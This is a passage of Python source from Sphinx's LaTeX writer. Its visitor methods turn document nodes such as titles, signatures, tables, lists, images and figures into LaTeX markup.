ret.append(r'\sphinxstyleindexpageref{%s:%s}' %
(entry[2], self.idescape(entry[3])) + CR)
ret.append(r'\end{sphinxtheindex}' + CR)
ret = []
# latex_domain_indices can be False/True or a list of index names
indices_config = self.config.latex_domain_indices
if indices_config:
for domain in self.builder.env.domains.values():
for indexcls in domain.indices:
indexname = f'{domain.name}-{indexcls.name}'
if isinstance(indices_config, list):
if indexname not in indices_config:
continue
content, collapsed = indexcls(domain).generate(
self.builder.docnames)
if not content:
continue
ret.append(r'\renewcommand{\indexname}{%s}' % indexcls.localname + CR)
generate(content, collapsed)
return ''.join(ret)
def render(self, template_name: str, variables: dict[str, Any]) -> str:
renderer = LaTeXRenderer(latex_engine=self.config.latex_engine)
for template_dir in self.config.templates_path:
template = path.join(self.builder.confdir, template_dir,
template_name)
if path.exists(template):
return renderer.render(template, variables)
return renderer.render(template_name, variables)
@property
def table(self) -> Table | None:
"""Get current table."""
if self.tables:
return self.tables[-1]
else:
return None
def visit_document(self, node: Element) -> None:
self.curfilestack.append(node.get('docname', ''))
if self.first_document == 1:
# the first document is all the regular content ...
self.first_document = 0
elif self.first_document == 0:
# ... and all others are the appendices
self.body.append(CR + r'\appendix' + CR)
self.first_document = -1
if 'docname' in node:
self.body.append(self.hypertarget(':doc'))
# "- 1" because the level is increased before the title is visited
self.sectionlevel = self.top_sectionlevel - 1
def depart_document(self, node: Element) -> None:
pass
def visit_start_of_file(self, node: Element) -> None:
self.curfilestack.append(node['docname'])
self.body.append(CR + r'\sphinxstepscope' + CR)
def depart_start_of_file(self, node: Element) -> None:
self.curfilestack.pop()
def visit_section(self, node: Element) -> None:
if not self.this_is_the_title:
self.sectionlevel += 1
self.body.append(BLANKLINE)
def depart_section(self, node: Element) -> None:
self.sectionlevel = max(self.sectionlevel - 1,
self.top_sectionlevel - 1)
def visit_problematic(self, node: Element) -> None:
self.body.append(r'{\color{red}\bfseries{}')
def depart_problematic(self, node: Element) -> None:
self.body.append('}')
def visit_topic(self, node: Element) -> None:
self.in_minipage = 1
self.body.append(CR + r'\begin{sphinxShadowBox}' + CR)
def depart_topic(self, node: Element) -> None:
self.in_minipage = 0
self.body.append(r'\end{sphinxShadowBox}' + CR)
visit_sidebar = visit_topic
depart_sidebar = depart_topic
def visit_glossary(self, node: Element) -> None:
pass
def depart_glossary(self, node: Element) -> None:
pass
def visit_productionlist(self, node: Element) -> None:
self.body.append(BLANKLINE)
self.body.append(r'\begin{productionlist}' + CR)
self.in_production_list = 1
def depart_productionlist(self, node: Element) -> None:
self.body.append(r'\end{productionlist}' + BLANKLINE)
self.in_production_list = 0
def visit_production(self, node: Element) -> None:
if node['tokenname']:
tn = node['tokenname']
self.body.append(self.hypertarget('grammar-token-' + tn))
self.body.append(r'\production{%s}{' % self.encode(tn))
else:
self.body.append(r'\productioncont{')
def depart_production(self, node: Element) -> None:
self.body.append('}' + CR)
def visit_transition(self, node: Element) -> None:
self.body.append(self.elements['transition'])
def depart_transition(self, node: Element) -> None:
pass
def visit_title(self, node: Element) -> None:
parent = node.parent
if isinstance(parent, addnodes.seealso):
# the environment already handles this
raise nodes.SkipNode
if isinstance(parent, nodes.section):
if self.this_is_the_title:
if len(node.children) != 1 and not isinstance(node.children[0],
nodes.Text):
logger.warning(__('document title is not a single Text node'),
location=node)
if not self.elements['title']:
# text needs to be escaped since it is inserted into
# the output literally
self.elements['title'] = self.escape(node.astext())
self.this_is_the_title = 0
raise nodes.SkipNode
short = ''
if any(node.findall(nodes.image)):
short = ('[%s]' % self.escape(' '.join(clean_astext(node).split())))
try:
self.body.append(fr'\{self.sectionnames[self.sectionlevel]}{short}{{')
except IndexError:
# just use "subparagraph", it's not numbered anyway
self.body.append(fr'\{self.sectionnames[-1]}{short}{{')
self.context.append('}' + CR + self.hypertarget_to(node.parent))
elif isinstance(parent, nodes.topic):
self.body.append(r'\sphinxstyletopictitle{')
self.context.append('}' + CR)
elif isinstance(parent, nodes.sidebar):
self.body.append(r'\sphinxstylesidebartitle{')
self.context.append('}' + CR)
elif isinstance(parent, nodes.Admonition):
self.body.append('{')
self.context.append('}' + CR)
elif isinstance(parent, nodes.table):
# Redirect body output until title is finished.
self.pushbody([])
else:
logger.warning(__('encountered title node not in section, topic, table, '
'admonition or sidebar'),
location=node)
self.body.append(r'\sphinxstyleothertitle{')
self.context.append('}' + CR)
self.in_title = 1
def depart_title(self, node: Element) -> None:
self.in_title = 0
if isinstance(node.parent, nodes.table):
assert self.table is not None
self.table.caption = self.popbody()
else:
self.body.append(self.context.pop())
def visit_subtitle(self, node: Element) -> None:
if isinstance(node.parent, nodes.sidebar):
self.body.append(r'\sphinxstylesidebarsubtitle{')
self.context.append('}' + CR)
else:
self.context.append('')
def depart_subtitle(self, node: Element) -> None:
self.body.append(self.context.pop())
#############################################################
# Domain-specific object descriptions
#############################################################
# Top-level nodes for descriptions
##################################
def visit_desc(self, node: Element) -> None:
if self.config.latex_show_urls == 'footnote':
self.body.append(BLANKLINE)
self.body.append(r'\begin{savenotes}\begin{fulllineitems}' + CR)
else:
self.body.append(BLANKLINE)
self.body.append(r'\begin{fulllineitems}' + CR)
if self.table:
self.table.has_problematic = True
def depart_desc(self, node: Element) -> None:
if self.in_desc_signature:
self.body.append(CR + r'\pysigstopsignatures')
self.in_desc_signature = False
if self.config.latex_show_urls == 'footnote':
self.body.append(CR + r'\end{fulllineitems}\end{savenotes}' + BLANKLINE)
else:
self.body.append(CR + r'\end{fulllineitems}' + BLANKLINE)
def _visit_signature_line(self, node: Element) -> None:
def next_sibling(e: Node) -> Node | None:
try:
return e.parent[e.parent.index(e) + 1]
except (AttributeError, IndexError):
return None
def has_multi_line(e: Element) -> bool:
return e.get('multi_line_parameter_list')
self.has_tp_list = False
for child in node:
if isinstance(child, addnodes.desc_type_parameter_list):
self.has_tp_list = True
# recall that return annotations must follow an argument list,
# so signatures of the form "foo[tp_list] -> retann" will not
# be encountered (if they should, the `domains.python.py_sig_re`
# pattern must be modified accordingly)
arglist = next_sibling(child)
assert isinstance(arglist, addnodes.desc_parameterlist)
# tp_list + arglist: \macro{name}{tp_list}{arglist}{return}
multi_tp_list = has_multi_line(child)
multi_arglist = has_multi_line(arglist)
if multi_tp_list:
if multi_arglist:
self.body.append(CR + r'\pysigwithonelineperargwithonelinepertparg{')
else:
self.body.append(CR + r'\pysiglinewithargsretwithonelinepertparg{')
else:
if multi_arglist:
self.body.append(CR + r'\pysigwithonelineperargwithtypelist{')
else:
self.body.append(CR + r'\pysiglinewithargsretwithtypelist{')
break
if isinstance(child, addnodes.desc_parameterlist):
# arglist only: \macro{name}{arglist}{return}
if has_multi_line(child):
self.body.append(CR + r'\pysigwithonelineperarg{')
else:
self.body.append(CR + r'\pysiglinewithargsret{')
break
else:
# no tp_list, no arglist: \macro{name}
self.body.append(CR + r'\pysigline{')
def _depart_signature_line(self, node: Element) -> None:
self.body.append('}')
def visit_desc_signature(self, node: Element) -> None:
hyper = ''
if node.parent['objtype'] != 'describe' and node['ids']:
for id in node['ids']:
hyper += self.hypertarget(id)
self.body.append(hyper)
if not self.in_desc_signature:
self.in_desc_signature = True
self.body.append(CR + r'\pysigstartsignatures')
if not node.get('is_multiline'):
self._visit_signature_line(node)
else:
self.body.append(CR + r'\pysigstartmultiline')
def depart_desc_signature(self, node: Element) -> None:
if not node.get('is_multiline'):
self._depart_signature_line(node)
else:
self.body.append(CR + r'\pysigstopmultiline')
def visit_desc_signature_line(self, node: Element) -> None:
self._visit_signature_line(node)
def depart_desc_signature_line(self, node: Element) -> None:
self._depart_signature_line(node)
def visit_desc_content(self, node: Element) -> None:
assert self.in_desc_signature
self.body.append(CR + r'\pysigstopsignatures')
self.in_desc_signature = False
def depart_desc_content(self, node: Element) -> None:
pass
def visit_desc_inline(self, node: Element) -> None:
self.body.append(r'\sphinxcode{\sphinxupquote{')
def depart_desc_inline(self, node: Element) -> None:
self.body.append('}}')
# Nodes for high-level structure in signatures
##############################################
def visit_desc_name(self, node: Element) -> None:
self.body.append(r'\sphinxbfcode{\sphinxupquote{')
self.literal_whitespace += 1
def depart_desc_name(self, node: Element) -> None:
self.body.append('}}')
self.literal_whitespace -= 1
def visit_desc_addname(self, node: Element) -> None:
self.body.append(r'\sphinxcode{\sphinxupquote{')
self.literal_whitespace += 1
def depart_desc_addname(self, node: Element) -> None:
self.body.append('}}')
self.literal_whitespace -= 1
def visit_desc_type(self, node: Element) -> None:
pass
def depart_desc_type(self, node: Element) -> None:
pass
def visit_desc_returns(self, node: Element) -> None:
self.body.append(r'{ $\rightarrow$ ')
def depart_desc_returns(self, node: Element) -> None:
self.body.append(r'}')
def _visit_sig_parameter_list(self, node: Element, parameter_group: type[Element]) -> None:
"""Visit a signature parameters or type parameters list.
The *parameter_group* value is the type of a child node acting as a required parameter
or as a set of contiguous optional parameters.
The caller is responsible for closing adding surrounding LaTeX macro argument start
and stop tokens.
"""
self.is_first_param = True
self.optional_param_level = 0
self.params_left_at_level = 0
self.param_group_index = 0
# Counts as what we call a parameter group either a required parameter, or a
# set of contiguous optional ones.
self.list_is_required_param = [isinstance(c, parameter_group) for c in node.children]
# How many required parameters are left.
self.required_params_left = sum(self.list_is_required_param)
self.param_separator = r'\sphinxparamcomma '
self.multi_line_parameter_list = node.get('multi_line_parameter_list', False)
def visit_desc_parameterlist(self, node: Element) -> None:
if not self.has_tp_list:
# close name argument (#1), open parameters list argument (#2)
self.body.append('}{')
self._visit_sig_parameter_list(node, addnodes.desc_parameter)
def depart_desc_parameterlist(self, node: Element) -> None:
# close parameterlist, open return annotation
self.body.append('}{')
def visit_desc_type_parameter_list(self, node: Element) -> None:
# close name argument (#1), open type parameters list argument (#2)
self.body.append('}{')
self._visit_sig_parameter_list(node, addnodes.desc_type_parameter)
def depart_desc_type_parameter_list(self, node: Element) -> None:
# close type parameters list, open parameters list argument (#3)
self.body.append('}{')
def _visit_sig_parameter(self, node: Element, parameter_macro: str) -> None:
if self.is_first_param:
self.is_first_param = False
elif not self.multi_line_parameter_list and not self.required_params_left:
self.body.append(self.param_separator)
if self.optional_param_level == 0:
self.required_params_left -= 1
else:
self.params_left_at_level -= 1
if not node.hasattr('noemph'):
self.body.append(parameter_macro)
def _depart_sig_parameter(self, node: Element) -> None:
if not node.hasattr('noemph'):
self.body.append('}')
is_required = self.list_is_required_param[self.param_group_index]
if self.multi_line_parameter_list:
is_last_group = self.param_group_index + 1 == len(self.list_is_required_param)
next_is_required = (
not is_last_group
and self.list_is_required_param[self.param_group_index + 1]
)
opt_param_left_at_level = self.params_left_at_level > 0
if opt_param_left_at_level or is_required and (is_last_group or next_is_required):
self.body.append(self.param_separator)
elif self.required_params_left:
self.body.append(self.param_separator)
if is_required:
self.param_group_index += 1
def visit_desc_parameter(self, node: Element) -> None:
self._visit_sig_parameter(node, r'\sphinxparam{')
def depart_desc_parameter(self, node: Element) -> None:
self._depart_sig_parameter(node)
def visit_desc_type_parameter(self, node: Element) -> None:
self._visit_sig_parameter(node, r'\sphinxtypeparam{')
def depart_desc_type_parameter(self, node: Element) -> None:
self._depart_sig_parameter(node)
def visit_desc_optional(self, node: Element) -> None:
self.params_left_at_level = sum([isinstance(c, addnodes.desc_parameter)
for c in node.children])
self.optional_param_level += 1
self.max_optional_param_level = self.optional_param_level
if self.multi_line_parameter_list:
if self.is_first_param:
self.body.append(r'\sphinxoptional{')
elif self.required_params_left:
self.body.append(self.param_separator)
self.body.append(r'\sphinxoptional{')
else:
self.body.append(r'\sphinxoptional{')
self.body.append(self.param_separator)
else:
self.body.append(r'\sphinxoptional{')
def depart_desc_optional(self, node: Element) -> None:
self.optional_param_level -= 1
if self.multi_line_parameter_list:
# If it's the first time we go down one level, add the separator before the
# bracket.
if self.optional_param_level == self.max_optional_param_level - 1:
self.body.append(self.param_separator)
self.body.append('}')
if self.optional_param_level == 0:
self.param_group_index += 1
def visit_desc_annotation(self, node: Element) -> None:
self.body.append(r'\sphinxbfcode{\sphinxupquote{')
def depart_desc_annotation(self, node: Element) -> None:
self.body.append('}}')
##############################################
def visit_seealso(self, node: Element) -> None:
self.body.append(BLANKLINE)
self.body.append(r'\begin{sphinxseealso}{%s:}' % admonitionlabels['seealso'] + CR)
def depart_seealso(self, node: Element) -> None:
self.body.append(BLANKLINE)
self.body.append(r'\end{sphinxseealso}')
self.body.append(BLANKLINE)
def visit_rubric(self, node: Element) -> None:
if len(node) == 1 and node.astext() in ('Footnotes', _('Footnotes')):
raise nodes.SkipNode
self.body.append(r'\subsubsection*{')
self.context.append('}' + CR)
self.in_title = 1
def depart_rubric(self, node: Element) -> None:
self.in_title = 0
self.body.append(self.context.pop())
def visit_footnote(self, node: Element) -> None:
self.in_footnote += 1
label = cast(nodes.label, node[0])
if self.in_parsed_literal:
self.body.append(r'\begin{footnote}[%s]' % label.astext())
else:
self.body.append('%' + CR)
self.body.append(r'\begin{footnote}[%s]' % label.astext())
if 'referred' in node:
# TODO: in future maybe output a latex macro with backrefs here
pass
self.body.append(r'\sphinxAtStartFootnote' + CR)
def depart_footnote(self, node: Element) -> None:
if self.in_parsed_literal:
self.body.append(r'\end{footnote}')
else:
self.body.append('%' + CR)
self.body.append(r'\end{footnote}')
self.in_footnote -= 1
def visit_label(self, node: Element) -> None:
raise nodes.SkipNode
def visit_tabular_col_spec(self, node: Element) -> None:
self.next_table_colspec = node['spec']
raise nodes.SkipNode
def visit_table(self, node: Element) -> None:
if len(self.tables) == 1:
assert self.table is not None
if self.table.get_table_type() == 'longtable':
raise UnsupportedError(
'%s:%s: longtable does not support nesting a table.' %
(self.curfilestack[-1], node.line or ''))
# change type of parent table to tabular
# see https://groups.google.com/d/msg/sphinx-users/7m3NeOBixeo/9LKP2B4WBQAJ
self.table.has_problematic = True
elif len(self.tables) > 2:
raise UnsupportedError(
'%s:%s: deeply nested tables are not implemented.' %
(self.curfilestack[-1], node.line or ''))
table = Table(node)
self.tables.append(table)
if table.colsep is None:
table.colsep = '|' * (
'booktabs' not in self.builder.config.latex_table_style
and 'borderless' not in self.builder.config.latex_table_style
)
if self.next_table_colspec:
table.colspec = '{%s}' % self.next_table_colspec + CR
if '|' in table.colspec:
table.styles.append('vlines')
table.colsep = '|'
else:
table.styles.append('novlines')
table.colsep = ''
if 'colwidths-given' in node.get('classes', []):
logger.info(__('both tabularcolumns and :widths: option are given. '
':widths: is ignored.'), location=node)
self.next_table_colspec = None
def depart_table(self, node: Element) -> None:
assert self.table is not None
labels = self.hypertarget_to(node)
table_type = self.table.get_table_type()
table = self.render(table_type + '.tex_t',
{'table': self.table, 'labels': labels})
self.body.append(BLANKLINE)
self.body.append(table)
self.body.append(CR)
self.tables.pop()
def visit_colspec(self, node: Element) -> None:
assert self.table is not None
self.table.colcount += 1
if 'colwidth' in node:
self.table.colwidths.append(node['colwidth'])
if 'stub' in node:
self.table.stubs.append(self.table.colcount - 1)
def depart_colspec(self, node: Element) -> None:
pass
def visit_tgroup(self, node: Element) -> None:
pass
def depart_tgroup(self, node: Element) -> None:
pass
def visit_thead(self, node: Element) -> None:
assert self.table is not None
# Redirect head output until header is finished.
self.pushbody(self.table.header)
def depart_thead(self, node: Element) -> None:
if self.body and self.body[-1] == r'\sphinxhline':
self.body.pop()
self.popbody()
def visit_tbody(self, node: Element) -> None:
assert self.table is not None
# Redirect body output until table is finished.
self.pushbody(self.table.body)
def depart_tbody(self, node: Element) -> None:
if self.body and self.body[-1] == r'\sphinxhline':
self.body.pop()
self.popbody()
def visit_row(self, node: Element) -> None:
assert self.table is not None
self.table.col = 0
_colsep = self.table.colsep
# fill columns if the row starts with the bottom of multirow cell
while True:
cell = self.table.cell(self.table.row, self.table.col)
if cell is None: # not a bottom of multirow cell
break
# a bottom of multirow cell
self.table.col += cell.width
if cell.col:
self.body.append('&')
if cell.width == 1:
# insert suitable strut for equalizing row heights in given multirow
self.body.append(r'\sphinxtablestrut{%d}' % cell.cell_id)
else: # use \multicolumn for wide multirow cell
self.body.append(r'\multicolumn{%d}{%sl%s}{\sphinxtablestrut{%d}}' %
(cell.width, _colsep, _colsep, cell.cell_id))
def depart_row(self, node: Element) -> None:
assert self.table is not None
self.body.append(r'\\' + CR)
cells = [self.table.cell(self.table.row, i) for i in range(self.table.colcount)]
underlined = [cell.row + cell.height == self.table.row + 1 # type: ignore[union-attr]
for cell in cells]
if all(underlined):
self.body.append(r'\sphinxhline')
else:
i = 0
underlined.extend([False]) # sentinel
if underlined[0] is False:
i = 1
while i < self.table.colcount and underlined[i] is False:
if cells[i - 1].cell_id != cells[i].cell_id: # type: ignore[union-attr]
self.body.append(r'\sphinxvlinecrossing{%d}' % i)
i += 1
while i < self.table.colcount:
# each time here underlined[i] is True
j = underlined[i:].index(False)
self.body.append(r'\sphinxcline{%d-%d}' % (i + 1, i + j))
i += j
i += 1
while i < self.table.colcount and underlined[i] is False:
if cells[i - 1].cell_id != cells[i].cell_id: # type: ignore[union-attr]
self.body.append(r'\sphinxvlinecrossing{%d}' % i)
i += 1
self.body.append(r'\sphinxfixclines{%d}' % self.table.colcount)
self.table.row += 1
def visit_entry(self, node: Element) -> None:
assert self.table is not None
if self.table.col > 0:
self.body.append('&')
self.table.add_cell(node.get('morerows', 0) + 1, node.get('morecols', 0) + 1)
cell = self.table.cell()
assert cell is not None
context = ''
_colsep = self.table.colsep
if cell.width > 1:
if self.config.latex_use_latex_multicolumn:
if self.table.col == 0:
self.body.append(r'\multicolumn{%d}{%sl%s}{%%' %
(cell.width, _colsep, _colsep) + CR)
else:
self.body.append(r'\multicolumn{%d}{l%s}{%%' % (cell.width, _colsep) + CR)
context = '}%' + CR
else:
self.body.append(r'\sphinxstartmulticolumn{%d}%%' % cell.width + CR)
context = r'\sphinxstopmulticolumn' + CR
if cell.height > 1:
# \sphinxmultirow 2nd arg "cell_id" will serve as id for LaTeX macros as well
self.body.append(r'\sphinxmultirow{%d}{%d}{%%' % (cell.height, cell.cell_id) + CR)
context = '}%' + CR + context
if cell.width > 1 or cell.height > 1:
self.body.append(r'\begin{varwidth}[t]{\sphinxcolwidth{%d}{%d}}'
% (cell.width, self.table.colcount) + CR)
context = (r'\par' + CR + r'\vskip-\baselineskip'
r'\vbox{\hbox{\strut}}\end{varwidth}%' + CR + context)
self.needs_linetrimming = 1
if len(list(node.findall(nodes.paragraph))) >= 2:
self.table.has_oldproblematic = True
if isinstance(node.parent.parent, nodes.thead) or (cell.col in self.table.stubs):
if len(node) == 1 and isinstance(node[0], nodes.paragraph) and node.astext() == '':
pass
else:
self.body.append(r'\sphinxstyletheadfamily ')
if self.needs_linetrimming:
self.pushbody([])
self.context.append(context)
def depart_entry(self, node: Element) -> None:
if self.needs_linetrimming:
self.needs_linetrimming = 0
body = self.popbody()
# Remove empty lines from top of merged cell
while body and body[0] == CR:
body.pop(0)
self.body.extend(body)
self.body.append(self.context.pop())
assert self.table is not None
cell = self.table.cell()
assert cell is not None
self.table.col += cell.width
_colsep = self.table.colsep
# fill columns if next ones are a bottom of wide-multirow cell
while True:
nextcell = self.table.cell()
if nextcell is None: # not a bottom of multirow cell
break
# a bottom part of multirow cell
self.body.append('&')
if nextcell.width == 1:
# insert suitable strut for equalizing row heights in multirow
# they also serve to clear colour panels which would hide the text
self.body.append(r'\sphinxtablestrut{%d}' % nextcell.cell_id)
else:
# use \multicolumn for not first row of wide multirow cell
self.body.append(r'\multicolumn{%d}{l%s}{\sphinxtablestrut{%d}}' %
(nextcell.width, _colsep, nextcell.cell_id))
self.table.col += nextcell.width
def visit_acks(self, node: Element) -> None:
# this is a list in the source, but should be rendered as a
# comma-separated list here
bullet_list = cast(nodes.bullet_list, node[0])
list_items = cast(Iterable[nodes.list_item], bullet_list)
self.body.append(BLANKLINE)
self.body.append(', '.join(n.astext() for n in list_items) + '.')
self.body.append(BLANKLINE)
raise nodes.SkipNode
def visit_bullet_list(self, node: Element) -> None:
if not self.compact_list:
self.body.append(r'\begin{itemize}' + CR)
if self.table:
self.table.has_problematic = True
def depart_bullet_list(self, node: Element) -> None:
if not self.compact_list:
self.body.append(r'\end{itemize}' + CR)
def visit_enumerated_list(self, node: Element) -> None:
def get_enumtype(node: Element) -> str:
enumtype = node.get('enumtype', 'arabic')
if 'alpha' in enumtype and (node.get('start', 0) + len(node)) > 26:
# fallback to arabic if alphabet counter overflows
enumtype = 'arabic'
return enumtype
def get_nested_level(node: Element) -> int:
if node is None:
return 0
elif isinstance(node, nodes.enumerated_list):
return get_nested_level(node.parent) + 1
else:
return get_nested_level(node.parent)
enum = "enum%s" % toRoman(get_nested_level(node)).lower()
enumnext = "enum%s" % toRoman(get_nested_level(node) + 1).lower()
style = ENUMERATE_LIST_STYLE.get(get_enumtype(node))
prefix = node.get('prefix', '')
suffix = node.get('suffix', '.')
self.body.append(r'\begin{enumerate}' + CR)
self.body.append(r'\sphinxsetlistlabels{%s}{%s}{%s}{%s}{%s}%%' %
(style, enum, enumnext, prefix, suffix) + CR)
if 'start' in node:
self.body.append(r'\setcounter{%s}{%d}' % (enum, node['start'] - 1) + CR)
if self.table:
self.table.has_problematic = True
def depart_enumerated_list(self, node: Element) -> None:
self.body.append(r'\end{enumerate}' + CR)
def visit_list_item(self, node: Element) -> None:
# Append "{}" in case the next character is "[", which would break
# LaTeX's list environment (no numbering and the "[" is not printed).
self.body.append(r'\item {} ')
def depart_list_item(self, node: Element) -> None:
self.body.append(CR)
def visit_definition_list(self, node: Element) -> None:
self.body.append(r'\begin{description}' + CR)
if self.table:
self.table.has_problematic = True
def depart_definition_list(self, node: Element) -> None:
self.body.append(r'\end{description}' + CR)
def visit_definition_list_item(self, node: Element) -> None:
pass
def depart_definition_list_item(self, node: Element) -> None:
pass
def visit_term(self, node: Element) -> None:
self.in_term += 1
ctx = ''
if node.get('ids'):
ctx = r'\phantomsection'
for node_id in node['ids']:
ctx += self.hypertarget(node_id, anchor=False)
ctx += r'}'
self.body.append(r'\sphinxlineitem{')
self.context.append(ctx)
def depart_term(self, node: Element) -> None:
self.body.append(self.context.pop())
self.in_term -= 1
def visit_classifier(self, node: Element) -> None:
self.body.append('{[}')
def depart_classifier(self, node: Element) -> None:
self.body.append('{]}')
def visit_definition(self, node: Element) -> None:
pass
def depart_definition(self, node: Element) -> None:
self.body.append(CR)
def visit_field_list(self, node: Element) -> None:
self.body.append(r'\begin{quote}\begin{description}' + CR)
if self.table:
self.table.has_problematic = True
def depart_field_list(self, node: Element) -> None:
self.body.append(r'\end{description}\end{quote}' + CR)
def visit_field(self, node: Element) -> None:
pass
def depart_field(self, node: Element) -> None:
pass
visit_field_name = visit_term
depart_field_name = depart_term
visit_field_body = visit_definition
depart_field_body = depart_definition
def visit_paragraph(self, node: Element) -> None:
index = node.parent.index(node)
if (index > 0 and isinstance(node.parent, nodes.compound) and
not isinstance(node.parent[index - 1], nodes.paragraph) and
not isinstance(node.parent[index - 1], nodes.compound)):
# insert blank line, if the paragraph follows a non-paragraph node in a compound
self.body.append(r'\noindent' + CR)
elif index == 1 and isinstance(node.parent, (nodes.footnote, footnotetext)):
# don't insert blank line, if the paragraph is second child of a footnote
# (first one is label node)
pass
else:
# the \sphinxAtStartPar is to allow hyphenation of first word of
# a paragraph in narrow contexts such as in a table cell
# added as two items (cf. line trimming in depart_entry())
self.body.extend([CR, r'\sphinxAtStartPar' + CR])
def depart_paragraph(self, node: Element) -> None:
self.body.append(CR)
def visit_centered(self, node: Element) -> None:
self.body.append(CR + r'\begin{center}')
if self.table:
self.table.has_problematic = True
def depart_centered(self, node: Element) -> None:
self.body.append(CR + r'\end{center}')
def visit_hlist(self, node: Element) -> None:
self.compact_list += 1
ncolumns = node['ncolumns']
if self.compact_list > 1:
self.body.append(r'\setlength{\multicolsep}{0pt}' + CR)
self.body.append(r'\begin{multicols}{' + ncolumns + r'}\raggedright' + CR)
self.body.append(r'\begin{itemize}\setlength{\itemsep}{0pt}'
r'\setlength{\parskip}{0pt}' + CR)
if self.table:
self.table.has_problematic = True
def depart_hlist(self, node: Element) -> None:
self.compact_list -= 1
self.body.append(r'\end{itemize}\raggedcolumns\end{multicols}' + CR)
def visit_hlistcol(self, node: Element) -> None:
pass
def depart_hlistcol(self, node: Element) -> None:
# \columnbreak would guarantee same columns as in html output. But
# some testing with long items showed that columns may be too uneven.
# And in case only of short items, the automatic column breaks should
# match the ones pre-computed by the hlist() directive.
# self.body.append(r'\columnbreak\n')
pass
def latex_image_length(self, width_str: str, scale: int = 100) -> str | None:
try:
return rstdim_to_latexdim(width_str, scale)
except ValueError:
logger.warning(__('dimension unit %s is invalid. Ignored.'), width_str)
return None
def is_inline(self, node: Element) -> bool:
"""Check whether a node represents an inline element."""
return isinstance(node.parent, nodes.TextElement)
def visit_image(self, node: Element) -> None:
pre: list[str] = [] # in reverse order
post: list[str] = []
include_graphics_options = []
has_hyperlink = isinstance(node.parent, nodes.reference)
if has_hyperlink:
is_inline = self.is_inline(node.parent)
else:
is_inline = self.is_inline(node)
if 'width' in node:
if 'scale' in node:
w = self.latex_image_length(node['width'], node['scale'])
else:
w = self.latex_image_length(node['width'])
if w:
include_graphics_options.append('width=%s' % w)
if 'height' in node:
if 'scale' in node:
h = self.latex_image_length(node['height'], node['scale'])
else:
h = self.latex_image_length(node['height'])
if h:
include_graphics_options.append('height=%s' % h)
if 'scale' in node:
if not include_graphics_options:
# if no "width" nor "height", \sphinxincludegraphics will fit
# to the available text width if oversized after rescaling.
include_graphics_options.append('scale=%s'
% (float(node['scale']) / 100.0))
if 'align' in node:
align_prepost = {
# By default latex aligns the top of an image.
(1, 'top'): ('', ''),
(1, 'middle'): (r'\raisebox{-0.5\height}{', '}'),
(1, 'bottom'): (r'\raisebox{-\height}{', '}'),
(0, 'center'): (r'{\hspace*{\fill}', r'\hspace*{\fill}}'),
# These 2 don't exactly do the right thing. The image should
# be floated alongside the paragraph. See
# https://www.w3.org/TR/html4/struct/objects.html#adef-align-IMG
(0, 'left'): ('{', r'\hspace*{\fill}}'),
(0, 'right'): (r'{\hspace*{\fill}', '}'),
}
try:
pre.append(align_prepost[is_inline, node['align']][0])
post.append(align_prepost[is_inline, node['align']][1])
except KeyError:
pass
if self.in_parsed_literal:
pre.append(r'{\sphinxunactivateextrasandspace ')
post.append('}')
if not is_inline and not has_hyperlink:
pre.append(CR + r'\noindent')
post.append(CR)
pre.reverse()
if node['uri'] in self.builder.images:
uri = self.builder.images[node['uri']]
else:
# missing image!
if self.ignore_missing_images:
return
uri = node['uri']
if uri.find('://') != -1:
# ignore remote images
return
self.body.extend(pre)
options = ''
if include_graphics_options:
options = '[%s]' % ','.join(include_graphics_options)
base, ext = path.splitext(uri)
if self.in_title and base:
# Lowercase tokens forcely because some fncychap themes capitalize
# the options of \sphinxincludegraphics unexpectedly (ex. WIDTH=...).
cmd = fr'\lowercase{{\sphinxincludegraphics{options}}}{{{{{base}}}{ext}}}'
else:
cmd = fr'\sphinxincludegraphics{options}{{{{{base}}}{ext}}}'
# escape filepath for includegraphics, https://tex.stackexchange.com/a/202714/41112
if '#' in base:
cmd = r'{\catcode`\#=12' + cmd + '}'
self.body.append(cmd)
self.body.extend(post)
def depart_image(self, node: Element) -> None:
pass
def visit_figure(self, node: Element) -> None:
align = self.elements['figure_align']
if self.no_latex_floats:
align = "H"
if self.table:
# TODO: support align option
if 'width' in node:
length = self.latex_image_length(node['width'])
if length:
self.body.append(r'\begin{sphinxfigure-in-table}[%s]' % length + CR)
self.body.append(r'\centering' + CR)
else:
self.body.append(r'\begin{sphinxfigure-in-table}' + CR)
self.body.append(r'\centering' + CR)
if any(isinstance(child, nodes.caption) for child in node):
self.body.append(r'\capstart')
self.context.append(r'\end{sphinxfigure-in-table}\relax' + CR)
elif node.get('align', '') in ('left', 'right'):
length = None
if 'width' in node:
length = self.latex_image_length(node['width'])
elif isinstance(node[0], nodes.image) and 'width' in node[0]:
length = self.latex_image_length(node[0]['width'])
# Insert a blank line to prevent an infinite loop
# https://github.com/sphinx-doc/sphinx/issues/7059
self.body.append(BLANKLINE)
self.body.append(r'\begin{wrapfigure}{%s}{%s}' %
('r' if node['align'] == 'right' else 'l', length or '0pt') + CR)
self.body.append(r'\centering')
self.context.append(r'\end{wrapfigure}' +
BLANKLINE +
r'\mbox{}\par\vskip-\dimexpr\baselineskip+\parskip\relax' +
CR) # avoid disappearance if no text next issues/11079
elif self.in_minipage:
self.body.append(CR + r'\begin{center}')
self.context.append(r'\end{center}' + CR)
else:
self.body.append(CR + r'\begin{figure}[%s]' % align + CR)
self.body.append(r'\centering' + CR)
if any(isinstance(child, nodes.caption) for child in node):
self.body.append(r'\capstart' + CR)
self.context.append(r'\end{figure}' + CR)
def depart_figure(self, node: Element) -> None:
self.body.append(self.context.pop())
def visit_caption(self, node: Element) -> None:
self.in_caption += 1
if isinstance(node.parent, captioned_literal_block):
self.body.append(r'\sphinxSetupCaptionForVerbatim{')
elif self.in_minipage and isinstance(node.parent, nodes.figure):
self.body.append(r'\captionof{figure}{')
elif self.table and node.parent.tagname == 'figure':
self.body.append(r'\sphinxfigcaption{')
else:
self.body.append(r'\caption{')
def depart_caption(self, node: Element) -> None:
self.body.append('}')
if isinstance(node.parent, nodes.figure):
labels = self.hypertarget_to(node.parent)
self.body.append(labels)
self.in_caption -= 1
def visit_legend(self, node: Element) -> None:
self.body.append(CR + r'\begin{sphinxlegend}')
def depart_legend(self, node: Element) -> None:
self.body.append(r'\end{sphinxlegend}' + CR)
def visit_admonition(self, node: Element) -> None:
self.body.append(CR + r'\begin{sphinxadmonition}{note}')
self.no_latex_floats += 1
def depart_admonition(self, node: Element) -> None:
self.body.append(r'\end{sphinxadmonition}' + CR)
self.no_latex_floats -= 1
def _visit_named_admonition(self, node: Element) -> None:
label = admonitionlabels[node.tagname]
